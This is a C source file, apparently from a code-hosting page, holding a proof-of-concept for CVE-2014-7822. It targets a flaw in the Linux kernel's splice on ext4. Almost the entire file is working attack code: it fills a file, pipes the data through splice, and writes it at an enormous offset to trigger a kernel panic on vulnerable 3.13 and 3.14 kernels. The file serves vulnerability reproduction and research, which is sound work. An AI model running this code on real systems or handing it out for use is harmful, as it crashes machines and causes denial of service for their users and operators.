112 lines
No EOL
3.7 KiB
C
112 lines
No EOL
3.7 KiB
C
/* ----------------------------------------------------------------------------------------------------
|
|
* cve-2014-7822_poc.c
|
|
*
|
|
* The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
|
|
* which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,
|
|
* as demonstrated by use of a file descriptor associated with an ext4 filesystem.
|
|
*
|
|
*
|
|
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
|
|
* Works on ext4 filesystem
|
|
* Tested on Ubuntu with 3.13 and 3.14 kernels
|
|
*
|
|
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c
|
|
*
|
|
*
|
|
* Emeric Nasi - www.sevagas.com
|
|
*-----------------------------------------------------------------------------------------------------*/
|
|
|
|
|
|
/* ----------------------- Includes ----------------------------*/
|
|
|
|
#define _GNU_SOURCE
|
|
#include <fcntl.h>
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <errno.h>
|
|
#include <string.h>
|
|
#include <stdlib.h>
|
|
#include <limits.h>
|
|
|
|
#define EXPLOIT_NAME "cve-2014-7822"
|
|
#define EXPLOIT_TYPE DOS
|
|
|
|
#define JUNK_SIZE 30000
|
|
|
|
/* ----------------------- functions ----------------------------*/
|
|
|
|
|
|
/* Useful:
|
|
*
|
|
+============+===============================+===============================+
|
|
| \ File flag| | |
|
|
| \ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL |
|
|
|Fs Features\| | |
|
|
+------------+-------------------------------+-------------------------------+
|
|
| !extent | write: 2194719883264 | write: -------------- |
|
|
| | seek: 2199023251456 | seek: -------------- |
|
|
+------------+-------------------------------+-------------------------------+
|
|
| extent | write: 4402345721856 | write: 17592186044415 |
|
|
| | seek: 17592186044415 | seek: 17592186044415 |
|
|
+------------+-------------------------------+-------------------------------+
|
|
*/
|
|
|
|
|
|
/**
|
|
* Poc for cve_2014_7822 vulnerability
|
|
*/
|
|
int main()
|
|
{
|
|
int pipefd[2];
|
|
int result;
|
|
int in_file;
|
|
int out_file;
|
|
int zulHandler;
|
|
loff_t viciousOffset = 0;
|
|
|
|
char junk[JUNK_SIZE] ={0};
|
|
|
|
result = pipe(pipefd);
|
|
|
|
// Create and clear zug.txt and zul.txt files
|
|
system("cat /dev/null > zul.txt");
|
|
system("cat /dev/null > zug.txt");
|
|
|
|
// Fill zul.txt with A
|
|
zulHandler = open("zul.txt", O_RDWR);
|
|
memset(junk,'A',JUNK_SIZE);
|
|
write(zulHandler, junk, JUNK_SIZE);
|
|
close(zulHandler);
|
|
|
|
//put content of zul.txt in pipe
|
|
viciousOffset = 0;
|
|
in_file = open("zul.txt", O_RDONLY);
|
|
result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);
|
|
close(in_file);
|
|
|
|
|
|
// Put content of pipe in zug.txt
|
|
out_file = open("zug.txt", O_RDWR);
|
|
viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!
|
|
printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);
|
|
|
|
result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615
|
|
if (result == -1)
|
|
{
|
|
printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
|
|
exit(1);
|
|
}
|
|
close(out_file);
|
|
|
|
close(pipefd[0]);
|
|
close(pipefd[1]);
|
|
|
|
|
|
//Open zug.txt
|
|
in_file = open("zug.txt", O_RDONLY);
|
|
close(in_file);
|
|
|
|
printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");
|
|
|
|
return 0;
|
|
} |